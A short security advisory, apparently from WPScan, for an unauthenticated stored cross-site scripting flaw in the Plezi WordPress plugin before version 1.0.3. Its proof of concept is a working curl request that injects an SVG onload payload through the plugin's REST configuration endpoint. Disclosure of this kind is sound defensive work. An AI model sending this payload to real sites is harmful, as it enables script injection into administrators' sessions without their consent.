Plezi < 1.0.3 - Unauthenticated Stored XSS

Description
The plugin has a REST endpoint allowing unauthenticated users to update the plz_configuration_tracker_enable option, which is then displayed in the admin panel without sanitisation and escaping, leading to a Stored Cross-Site Scripting issue

Proof of Concept

curl -X POST 'https://example.com/wp-json/plz/v2/configuration/update-tracker?switchstatus="><svg/onload=alert(`XSS`)>' 

References

https://wpscan.com/vulnerability/7cede02e-9af7-4f50-95a8-84ef4c7f7ded